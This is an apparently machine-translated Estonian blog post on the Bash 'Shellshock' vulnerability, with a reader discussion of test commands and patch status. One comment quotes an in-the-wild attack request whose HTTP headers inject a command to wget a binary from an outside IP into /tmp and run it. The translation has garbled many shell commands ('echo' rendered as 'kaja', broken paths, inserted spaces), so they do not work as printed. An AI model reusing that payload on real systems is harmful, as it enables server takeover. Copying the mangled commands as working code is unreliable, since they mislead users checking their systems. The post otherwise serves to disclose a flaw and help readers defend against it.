Bash: tuvastatud (ja parandatud) uus haavatavus

Mõnes ajaveebis töötab see kulutulena, see on ajalehes avaldatud uudis turvablogi de Red Hat Bashis leitud haavatavuse kohta globaalsete muutujate väärkasutamise tõttu. Esialgsete uudiste kohaselt:

"... Haavatavus on tingitud asjaolust, et enne bashi kesta kutsumist saate luua spetsiaalselt välja töötatud väärtustega keskkonnamuutujaid. Need muutujad võivad sisaldada koodi, mis käivitatakse kohe, kui kest käivitatakse. Nende väljatöötatud muutujate nimi pole oluline, ainult nende sisu. Seetõttu on see haavatavus paljuski avatudNäiteks:

  • ForceCommand seda kasutatakse sshd konfiguratsioonides, et pakkuda kaugkasutajatele piiratud käsu täitmise võimalusi. Seda viga saab kasutada selle vältimiseks ja suvalise käsu täitmise tagamiseks. Mõnes Giti ja Subversioni rakenduses kasutatakse selliseid piiratud kestasid. See ei mõjuta OpenSSH-i regulaarset kasutamist, kuna kasutajatel on juba juurdepääs konsoolile.
  • Apache-serverit, mis kasutab mod_cgi või mod_cgid, mõjutab see, kui CGI-skriptid on kirjutatud nii bashi kui ka kudemise alamtase. Selliseid alamtasemeid kasutab kaudselt süsteem / popen C-s, os.system / os.popen Pythonis, kui PHP-s kasutatakse süsteemi / exec-i kestat (kui töötab CGI-režiimis) ja avage / system Perlis (mis sõltub käsureast).
  • Mod_php-ga käivitatud PHP-skripte see ei mõjuta, isegi kui mängitakse alatasemeid.
  • DHCP-kliendid kutsuvad süsteemi konfigureerimiseks shelliskripte, mille väärtused võetakse potentsiaalselt pahatahtlikust serverist. See võimaldaks suvalisi käske DHCP-kliendimasinas tavaliselt juurena täita.
  • Erinevad deemonid ja programmid, millel on SUID-i õigused, saavad käivitada shelliskripte kasutaja määratud / mõjutatud keskkonnamuutuja väärtustega, mis võimaldaks suvalisi käske täita.
  • Mis tahes muu rakendus, mis haakub shelliga või töötab shelliskripti, nagu näiteks bashi kasutamine tõlgina. Shelli skriptid, mis muutujaid ei eksporti, pole selle probleemi suhtes kaitsetud, isegi kui nad töötlevad ebausaldusväärset sisu ja salvestavad selle shellimuutujad (vasakul) ja alatasemed on avatud.

... "

Kuidas teada saada, kas minu bash on mõjutatud?

Seda arvestades on väga lihtne viis teada saada, kas meid see haavatavus mõjutab. Tegelikult katsetasin oma Antergos ja mul pole ilmselt probleemi. Peame avama terminali ja panema:

env x = '() {:;}; kaja haavatav 'bash -c "kaja see on test"

Kui see nii välja tuleb, pole meil probleeme:

env x = '() {:;}; echo haavatav 'bash -c "kaja see on test" bash: hoiatus: x: funktsiooni definitsiooni ignoreerimine katse bash: viga `x' funktsiooni definitsiooni importimisel see on test

Kui tulemus on erinev, võiksite kasutada meie eelistatud jaotuste värskenduskanaleid, et näha, kas nad on plaastri juba rakendanud. Nii et teate 😉

Värskendatud: see on Ubuntu 14:04 kasutava töökaaslase väljund:

env x = '() {:;}; kaja haavatav 'bash -c "kaja see on test" haavatav see on test

Nagu näete, on see seni haavatav.


Jäta oma kommentaar

Sinu e-postiaadressi ei avaldata. Kohustuslikud väljad on tähistatud *

*

*

  1. Andmete eest vastutab: Miguel Ángel Gatón
  2. Andmete eesmärk: Rämpsposti kontrollimine, kommentaaride haldamine.
  3. Seadustamine: teie nõusolek
  4. Andmete edastamine: andmeid ei edastata kolmandatele isikutele, välja arvatud juriidilise kohustuse alusel.
  5. Andmete salvestamine: andmebaas, mida haldab Occentus Networks (EL)
  6. Õigused: igal ajal saate oma teavet piirata, taastada ja kustutada.

  1.   Gerson DIJO

    Mul on Kubuntu 14.04 64-st ja saan ka:

    env x = '() {:;}; kaja haavatav 'bash -c "kaja see on test"
    haavatav
    see on test

    Olen juba värskendanud, kuid see pole õige. Mida teha?

    1.    elav DIJO

      Oodake nende värskendamist. Juba eOS näiteks uuendatud .. 😀

    2.    John DIJO

      Kui imelik, mul on ka Kubuntu 14.04

      $ env x = '() {:;}; kaja haavatav 'bash -c "kaja see on test"
      bash: hoiatus: x: funktsiooni määratlemise katse ignoreerimine
      bash: viga funktsiooni definitsiooni importimisel x-le
      see on test

      1.    John DIJO

        Lisan, et täna alla laaditud paketi "bash" versioon on:
        4.3

        http://packages.ubuntu.com/trusty/bash

    3.    eliotime3000 DIJO

      Minu puhul annab see käsu andmise korral mulle terminalis lihtsalt järgmise:

      >

      Igatahes on see nali, et värskendasin Debiani Wheezyt ja see pani mind maha.

      1.    yukiteru DIJO

        Wheezy on vea teise osa suhtes endiselt haavatav, vähemalt pärastlõunaks (UTC -4: 30) oli probleem endiselt järgmine: /

  2.   Petercheco DIJO

    Ma lihtsalt kontrollisin, et pärast täna hommikul värskenduse rakendamist ei mõjuta see Slackware'i, Debiani ega Centost, kuna nad said vastava värskenduse.

    Mis muudab Ubuntu sel tunnil endiselt haavatavaks? Ja ütle mulle, et see on ohutu: D.

    1.    John DIJO

      Kuid kas olete proovinud Ubuntu värskendada?
      Tänase värskendusega on nad selle ka parandanud.

      1.    Petercheco DIJO

        OK

    2.    robet DIJO

      Turvaeksperdid hoiatavad Bashi haavatavuse eest, see võib Linuxi tarkvara kasutajatele kujutada suuremat ohtu kui Heartbleedi viga, kus häkkerid saavad Bashi vea ära kasutada, et süsteem täielikult üle kontrollida.
      Küberjulgeolekuettevõtte Rapid7 insenerijuht Tod Beardsley hoiatas, et viga hinnati selle raskusastme järgi 10-le, see tähendab, et sellel on maksimaalne mõju, ja selle hindamise "keerukus", st mis on häkkerirünnakute jaoks suhteliselt lihtne. Selle haavatavuse abil saavad ründajad potentsiaalselt operatsioonisüsteemi enda kontrolli alla võtta, pääseda juurde konfidentsiaalsele teabele, teha muudatusi jne, "ütles Beardsley. "Kõik, kellel on süsteemid, mis Bashi hõivavad, peaksid plaastri kohe paigaldama," lisas ta.
      ENNE SEDA VASTAVUST, MIS ESITAB VANA TÖÖRIISTAT (GNU), kus Bachi hostitakse, oleks Linuxi tarkvaral mugavam GNU-st lahti saada ja BSD-tööriista vahetada.

      PS: ärge tsenseerige minu sõnavabadust, ... ärge solvake kedagi, ... ärge kustutage minu sõnumit nagu eelmine kiri, mille ma kustutasin!

      1.    Xerix DIJO

        Oh palun ära pinguta üle. Kuidas ma jälestan neid inimesi, kes kasutavad BSD-d ja põlgavad nendest projektidest GNU-d, Linuxi või midagi muud.

      2.    Petercheco DIJO

        Olen teiega ja teil on selle augu tõsiduse osas täiesti õigus.

      3.    diasepaan DIJO

        See ei olnud tsensuur, vaid koondamine (sama kommentaari tegite gnome 3.14 postituses)

      4.    Personal DIJO

        «... ja selle hindamine oli MÄRGUS ekspluateerimise keerukuse jaoks, mis tähendab, et seda on häkkerirünnakute jaoks suhteliselt lihtne

        Kas vastuolu on märgatav?
        Kuidas saab haavatavust lihtsalt ära kasutada ja samal ajal olla "madal" riskitase, kuna selle kasutamine on nii keeruline?
        See on viga, mis lahendati tundide jooksul pärast teineteise tundmist ja millel, nagu ka südamest, pole teateid selle kohta, et teda oleks kasutatud (muidugi on sellel vähem aega üksteise tundmiseks).
        See on pigem tabloid ajakirjandus kui reaalne risk.

      5.    Petercheco DIJO

        Kas @Staff tundub teile ebaoluline? Mida sa mulle nüüd ütled?

        GET./.HTTP/1.0
        .Kasutaja-agent: .Tänan-Rob
        .Küpsis: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        .Host: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        .Viitaja: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
        Nõus:. * / *

        $ fail nginx
        nginx: ELF 32-bitine LSB käivitatav fail, Intel 80386, versioon 1 (SYSV), staatiliselt lingitud, GNU / Linux 2.6.18 jaoks, eemaldatud

        $md5sum nginx
        5924bcc045bb7039f55c6ce29234e29a nginx

        $ sha256summa nginx
        73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx

        Kas sa tead, mis see on? Vähe ohtlikust ...

      6.    yukiteru DIJO

        Olukord on üsna tõsine, kuid sealt edasi öelda, et BSD-i jaoks peaksite lõpetama bashi kasutamise, see on juba nii palju, igatahes on värskendus juba olemas, puudutan lihtsalt värskendust ja mitte midagi muud.

        Nüüd on PD, ma arvan, et see on rohkem kolleeg @robet, ma ei arva, et siin on administraatorid pühendunud selliste kommentaaride kustutamisele, sest jah, sest kuna ma selles kogukonnas osalesin, on mul selline tunne ja ma loodan, et see nii ka jääb.

        Tervitused.

      7.    elav DIJO

        Täpselt sama kommentaari panite kahele erinevale postitusele. Kui üritate reklaamida uudiste allikat, siis vabandust, see pole õige koht.

      8.    Mario DIJO

        Bash pärineb Unixist (ja selle GNU kloonist). Mõjutatud on ka BSD-põhised süsteemid nagu OSX ja Genbeta sõnul pole nad seda veel lappinud. Samamoodi on Bashile juurdepääsemiseks vaja kas kohalikku või SSH-i kaudu kasutajat.

      9.    yukiteru DIJO

        @Töötajad:

        1.- See on liigitatud 10. tasemeks (maksimaalne ohutase), kuna viga võib mõjutada teenuste hulka. Peamises märkuses teevad nad selle fakti väga selgeks, väites, et viga võib mõjutada selliseid teenuseid nagu apache, sshd, suidi lubadega programmid (muu hulgas xorg).

        2.- Kui see puudutab selle rakendamist, liigitatakse see madalate raskuste tasemeks ja selle parim näide on haavatavustesti skript, mille @elav postitusse on pannud. Väga raske rakendada ei ole, nagu näete.

        Ma ei näe infos koondamist (näen ainult Google'i tõlget) ja kui probleem on üsna tõsine, ja nagu te ütlete, on sellel juba plaaster ja lahendus, kuid mitte selleks, see pole enam risk ja üsna reaalne .

      10.    Personal DIJO

        @petercheco / @Yukiteru

        Ärge tõlgendage mind valesti, ma arvan, et on selge, et minu kriitika on uudis, mille Robet seob ja keskendub ebakõlale ja mitte koondamisele.

        Samamoodi peame tegema vahet riskil ja ohul (viimast ei maini), kasutame neid tavaliselt sünonüümidena, kuid siin oleks oht vea kahjustusvõime ja risk selle esinemise tõenäosusega.
        Oma konkreetsel juhul sisenesin eilsest. See polnud mõeldud meililistide vms jaoks, see oli mõeldud töölaua levitamiseks! Võtsin telefoni ja saatsin sysadminile sõnumi koos lingiga ning kinnitasin, et mul on kõik lappitud, siis vabandage mind, kuid see uudis ei hoia mind ärkvel.

      11.    robet DIJO

        Teistes foorumites mainivad nad Bashi haavatavust, "lahendust, mille Debian ja Ubuntu avaldasid", kuid täna avastasid nad, et haavatavus on endiselt olemas, nii et lahendus oli puudulik, seda nad mainivad!

        Ma näen, et paljud on mind kritiseerinud lihtsa asjaolu eest, mis takistab inimesi haavatavuse raskusastmest - kvalifitseerub maksimaalse ohtlikkuse tasemega 10 ning mainib Linuxi tarkvara võimalikke lahendusi enne aegunud GNU tööriista, kus Bashi majutatakse - mis on ideaalselt GNU võiks Linuxi tarkvaras asendada BSD tööriistaga,… kasutan ka Linuxit ja mulle meeldib Linux!

        Täpsustan, et Bash ei ole vaikimisi installitud BSD-sse, see on veel üks Linuxi ühilduvuspakett, mida saab BSD-sse installida ... jah! Allikas on paigutatud nii, et nad saaksid uudiseid kontrollida, kuna paljud kasutajad ei usu mõnikord sõnumit ega kommentaari.

        1.    elav DIJO

          robet: Nagu nad teile juba korduvalt rääkisid, panite oma uudise kommentaari juba postitusse, te ei pea seda igasse kommenteeritavasse postitusse panema.

          Bashil on ka teisi kestasid, mida saab kasutada juhul, kui Bash on haavatav. 😉

      12.    Mario DIJO

        Robet, et ma tean, et pole ühtegi tarkvara, mis ühendaks Linuxi tuuma BSD kasutamaaga. Lähim on vastupidi, kBSD + GNU, nagu seda teevad Gentoo ja Debian. Pealegi ei saa GNU-d (1983) nimetada "vanamoodsaks", kui see on BSD (1977) järgi. Mõlemad jagavad oma unix-juurt (kuid mitte koodi), kui Linux loodaks siis, kui Linus T oli veel laps, oleks olemas "Linuxi ühilduvus".

  3.   manuelperez DIJO

    Umbes, Debiani testimine on praegu "haavatav", milline triip meil on ...

    1.    mrcelhw DIJO

      Ma kasutan Debiani testimist ja isegi selles harus oleme bashi värskenduse saanud

  4.   diasepaan DIJO

    genbeta järgi on ka teine ​​haavatavus
    http://seclists.org/oss-sec/2014/q3/685

    käsk päringuks on
    env X = '() {(a) => \' sh -c "kaja haavatav"; bash -c "kaja ebaõnnestumine 2 on lahti"

    1.    elav DIJO
      env X = '() {(a) => \' sh -c "kaja haavatav"; bash -c "kaja Lahendamata rike 2" sh: X: rida 1: süntaktiline viga ootamatu elemendi lähedal "=" sh: X: rida 1: "" sh: viga funktsiooni definitsiooni importimisel "X" sh jaoks - Haavatav - 2. tõrke täitmata käsku ei leitud
      
      1.    diasepaan DIJO

        sama mina.

      2.    giskard DIJO

        Sama siin. Kuid postituse algne viga oli lappitud (L) Ubuntu 14.04-s

      3.    x11tete11x DIJO

        Selle asemel, et teha lihtsat kaja, et see täidaks privileege nõudvat käsku, viskan ma "ebapiisavad privileegid" ... see viga ei eskaleeri privileege? Kui see ei suurenda privileege, siis pole see nii ohtlik kui nad seda värvivad.

      4.    Xurxo DIJO

        Sul on õigus!! need olid kaks haavatavust ...

        Mulle Linux Mint 17-s pärast teist bash-värskendust, mille nad eile õhtul Ubuntu hoidlatesse panid, kui selle käsu täitmisel pakub shell järgmist väljundit:

        env X = '() {(a) => \' sh -c "kaja haavatav"; bash -c "echo Fail 2 unpaatched"
        >

        Varasemate värskendamiseks Ubuntu hoidlatesse pandud "bassh" versioon on järgmine:

        4.3

        Debiani tuletatud süsteemides saate installitud versiooni kontrollida selle käsuga:

        dpkg -s bash | grep versioon

        Igal juhul tuleks see vähemalt Debiani, Ubuntu ja Mint kasutajate jaoks selgeks teha; Te ei tohiks olla liiga mures programmide üle, mis käitavad skripte päisega #! / Bin / sh, kuna nendes jaotustes ei kutsu bin / sh "bash", vaid seob kestaga "kriips" (kriips on :)

        Debiani alkeemikukonsool (kriips) on tuletatud POSIX-konsool
        tuhast.
        .
        Kuna see käivitab skripte kiiremini kui bash ja sellel on vähem sõltuvusi
        - teegid (mis muudavad selle tarkvararikkete või muude võimalike tõrgeteta)
        riistvara), kasutatakse seda süsteemide vaikekonsoolina
        Debian.

        Nii et vähemalt Ubuntus kasutatakse "bashi" kasutaja sisselogimise kestana (ka juurkasutaja jaoks). Kuid iga kasutaja saab kasutaja ja juurkonsoolide (terminalide) jaoks vaikimisi kasutada mõnda muud kestat.

        Nende käskude abil on lihtne kontrollida, kas kest käivitab skriptid (#! / Bin / sh):

        fail / bin / sh
        (väljund on / bin / sh: sümboolne link kriipsule) järgime jälge, korrates käsku

        fail / prügikast / kriips
        (väljund on / bin / dash: ELF 64-bitine LSB jagatud objekt, x86-64, versioon 1 (SYSV), nii et see on käivitatav fail.

        Need on tulemused Linux Mint 17. jaotises. Muudes mitte Ubuntu / Debiani põhistes jaotustes võivad need olla erinevad.

        Vaikekesta vahetamine pole keeruline !! võite kasutajate ja juurkasutajate jaoks kasutada isegi erinevat. Tegelikult peate lihtsalt installima eelistatud kesta ja muutma vaikesätet käsuga "chsh" või muutes faili / etc / passwd (kuigi kasutajad, kes ei tea faili "passwd" redigeerimisel vea tagajärgi, on see siiski Parem on, et nad teavitaksid ennast väga hästi ja enne selle redigeerimist tehke originaalist koopia, kui on vaja seda taastada).

        Tunnen end "tcsh" -ga mugavamalt (tcsh on :)

        TENEX C konsool, Berkeley csh täiustatud versioon

        "Csh" on see, mida Mac OS X mõni aasta tagasi kasutas. Midagi loogilist arvestades, et suur osa Apple'i operatsioonisüsteemist on FreeBSD kood. Eile loetu põhjal näib, et need pakuvad "terminali" ka kasutajaterminalidele.

        JÄRELDUSED:

        - Paigutatud "bash" versioonid enamkasutatavate jaotuste jaoks "on juba levitatud
        - Versioon versioonist "bash" 4.3-7ubuntu1.2 ja uuemad ei sisalda neid vigu
        - OS * Linuxis pole "bashi" kasutamine kohustuslik
        - Vähesed * Linuxi distributsioonide lingid #! / Bin / sh "bashiga"
        - On olemas alternatiive: tuhk, kriips, csh, tcsh ja veel mõned
        - Vaikimisi kest, mida süsteem terminali avamisel kutsub, pole keeruline muuta
        - Vähesed väikesed seadmed (ruuterid ja teised) kasutavad "bash", sest see on väga suur !!

      5.    Xurxo DIJO

        Praegu on just saabunud uus värskendus, mis installib versiooni "bash" 4.3-7ubuntu1.3

        Linux Mint 17 ja Ubuntu 14.04.1 LTS jaoks

        1.    elav DIJO

          ArchLinux sisestas versiooni bash-4.3.026-1

    2.    robet DIJO

      @ Xurxo ... .csh Berkeleyst?, ... Mõistate midagi sellest, mida ma ülalpool räägin, ja parem on kasutada BSD-d "csh" ... mitte vana GNU tööriista, kus Bashi hostitakse. See tööriist on Linuxi tarkvara jaoks parim.

  5.   Gonzalo DIJO

    Ja mis oleks lahendus?

    1.    elav DIJO

      Oodake, kuni nad teie distributsioonis paketti värskendavad 😉

  6.   Paul Ivan Correa DIJO

    haavatav
    see on test

    Ubuntu Studio 14.04 jaoks pole veel plaastrit

    1.    Wisp DIJO

      Remonditud Ubuntu Studio 14.04.1
      wisp @ ubuntustudio: ~ $ env x = '() {:;}; kaja haavatav 'bash -c "kaja see on test"
      bash: hoiatus: x: funktsiooni määratlemise katse ignoreerimine
      bash: viga funktsiooni definitsiooni importimisel x-le
      see on test

  7.   rändur DIJO

    Tegelikult on see väike haavatavus, kui see mõjutab teid, siis see, et tegite enne midagi valesti ...

    Kuna rootsiõigustega töötavat bashi skripti ei tohiks kunagi kasutajale kokku puutuda. Ja kui ta jookseb ilma privileegideta, pole sellist vastupanu. Tegelikult on see jama. Palju hirmutav.

    1.    Xerix DIJO

      Ma arvan sama.

    2.    Personal DIJO

      Täpselt, et rohkem ajalehti müüa või külastusi saada, on need vead head.
      Kuid nad unustavad alati mainida, et sellise skriptiga arvuti rikkumiseks peab teil kõigepealt olema juurdepääs bashile ja seejärel juur.

      1.    Dario DIJO

        personal, kui kasutate cgi-ga apache'i, sisestage lihtsalt küpsised http-päised või suunake funktsioon, mida soovite käivitada. Seda on kasutatud isegi usside levitamiseks.

    3.    Dario DIJO

      ja kui keegi paneb kesta serverisse wget mishell.php-ga, siis pole see sel juhul tõsine?

    4.    eliotime3000 DIJO

      Nõustun teiega. Ma arvasin, et see oli tohutu viga nagu Heartbleedis (isegi NSA laenas ennast haigestumuse soodustamiseks), kuid lõppude lõpuks oli see väike viga.

      On ka muid tõeliselt tõsiseid vigu, nagu Flashi meeletu tarbimine ja Pepper Flash Playeri jõudluse aeglustumine ning juba parandatud viga webRTC viga Chrome'is ja Firefoxis.

  8.   Köitja DIJO

    Kas teate, kas selles on kokkulepe inimestele, kellel on Linux Mint 16?

  9.   Oscar DIJO

    Debiani testimisel oli see juba fikseeritud.

  10.   yoyo DIJO

    Minu 5 distros on see lahendatud, OS X-is ei tea.

    Palun ärge tsenseerige minu kommentaari, ütlesin OS X. Ma ei tea, kas saate sellel saidil öelda OS X.

    1.    tannhausser DIJO

      @yoyo noh, ära hulluta seda, et nad töötavad endiselt plaastri mõningate üksikasjadega ... proovige seda ja rääkige mulle siis, kuidas XD

      env x = '() {:;}; kaja kaitsetu 'bash -c "kaja Olen haavatavam kui iphone 6 prügikast"

      Et kui nad on selle enne OS X-i 100% lahendanud, panustan ma midagi

    2.    eliotime3000 DIJO

      Noh, isegi Ars Technicas annavad nad OSXis Bashile asjakohasuse.

    3.    elav DIJO

      @Yoyo järgmine rämpsposti OS X-i kommentaar .. lla tu save .. 😛

  11.   tannhausser DIJO

    @yoyo seal pakkumiste parandamiseks ... aga ülejäänud teate you

    1.    eliotime3000 DIJO

      Nagu nad oleksid OSXiga patroneerinud (kuna OSX kasutab endiselt Bashi: v).

      Igatahes ei pea ma Debian Jessiega nii palju jamama.

  12.   elhui2 DIJO

    Kui süsteem on Cent OS-is haavatav:
    puhastage kõik && yum update bash

    bashi versiooni nägemiseks:
    p / min -qa | grep bash

    Kui versioon on varasem kui bash-4.1.2-15.el6_5.1, võib teie süsteem olla haavatav!

    Tervitused.

  13.   manuelperez DIJO

    2. haavatavus pole veel lahendatud

    env amvariable2 = '() {(a) => \' sh -c "echo amVulnerable"; bash -c "kaja ebaõnnestumine 2 on lahti"

  14.   Jeesus Perales DIJO

    Värskendamine ...

  15.   lüliti DIJO

    Gentoo's juhtub minuga vastupidi, ma olen haavatav ainult esimese ebaõnnestumise suhtes, kuid teisega saan selle:
    [kood] sh: X: rida 1: süntaktiline viga ootamatu elemendi lähedal = =
    sh: X: rida 1: "
    sh: viga X-i funktsiooni definitsiooni importimisel
    sh: haavatav: käsku ei leitud
    Viga 2 pole plaasterdatud
    [/ kood]
    Ma ei tea, kas Bashi stabiilset versiooni on juba parandatud, kuid mõlemal juhul jääb see järgmiseks korraks ootele: värskendan kogu süsteemi).

    1.    yukiteru DIJO

      Mul on Gentoo versiooniga 4.2_p50 ja siiani on see kõik testid läbinud. Proovige esile kerkida –sync ja seejärel ilmuda -av1 app-shells / bash ning seejärel kontrollida, kas teil on versioon 4.2_p50, kasutades käsku bash –version.

  16.   Fer DIJO

    Kas olete seda proovinud?

    Uute pakettidega Red Hat'i pakutav uus test

    cd / tmp; rm -f / tmp / kaja; env 'x = () {(a) => \' bash -c "kajakuupäev"; kass / tmp / kaja

    Kui meie süsteem pole haavatav ja seda on korrektselt lappitud, peab see meile midagi sellist pakkuma
    1 kuupäev
    2 cat: / tmp / echo: faili või kataloogi pole olemas

  17.   yukiteru DIJO

    Proovige nii:

    env X = '() {(a) => \' sh -c "kaja haavatav"; bash -c "kaja tõrge 2 lappitud"

    Ma saan

    haavatav
    Viga 2 lapitud.

    1.    yukiteru DIJO

      Unusta ära, rida on halvasti vormindatud.

  18.   oscar meza DIJO

    Suurepärane! Ma tegin oma Slackware'is juba värskenduse, aitäh!

  19.   lothbrok DIJO

    Tere, mul on küsimus, mul on mitu serverit 10 bitiga "SUSE Linux Enterprise Server 64".
    Käskude täitmisel olen haavatav, olen isegi haavatavam kui iPhone 6 xD prügikast
    Kui ma ei eksi pakettide värskendamist / installimist SUSE-s, tehakse seda käsuga «zypper».

    Mõnes serveris ütleb see mulle seda:

    BIAL: ~ # tõmblukk üles
    -bash: zypper: käsku ei leitud
    BIAL: ~ #

    Ja teistes:

    SMB: ~ # tõmblukk üles
    Süsteemiallikate taastamine ...
    SUSE Linux Enterprise Server 10 hoolduspaketi SP2-20100319-161944 metaandmete sõelumine ...
    RPM-i andmebaasi sõelumine ...
    Kokkuvõte:
    Pole midagi teha.

    Mida ma teen?
    Ma tean, et mõned ütlevad, et haavatavus on väiksem kui see, mida nad selle maalivad, kuid mul on see olemas ja ma ei taha riskida, olgu see siis väike või suur.

    Tervitused.

  20.   Sanders gutierrez DIJO

    Head ööd, olen proovinud kleepida koodi, mille te artiklis esitasite, ma saan selle
    lihvimismasinad @ pc-lihvimismasinad: ~ $ env x = '() {:;}; kaja haavatav 'bash -c "kaja see on test"
    see on test
    lihvimismasinad @ pc-lihvimismasinad: ~ $
    Kas te selgitaksite mulle, kuidas levitada plahvatust, värskendan seda iga päev ja viiba väljundis ei näe muudatusi.

    Tänan teid väga!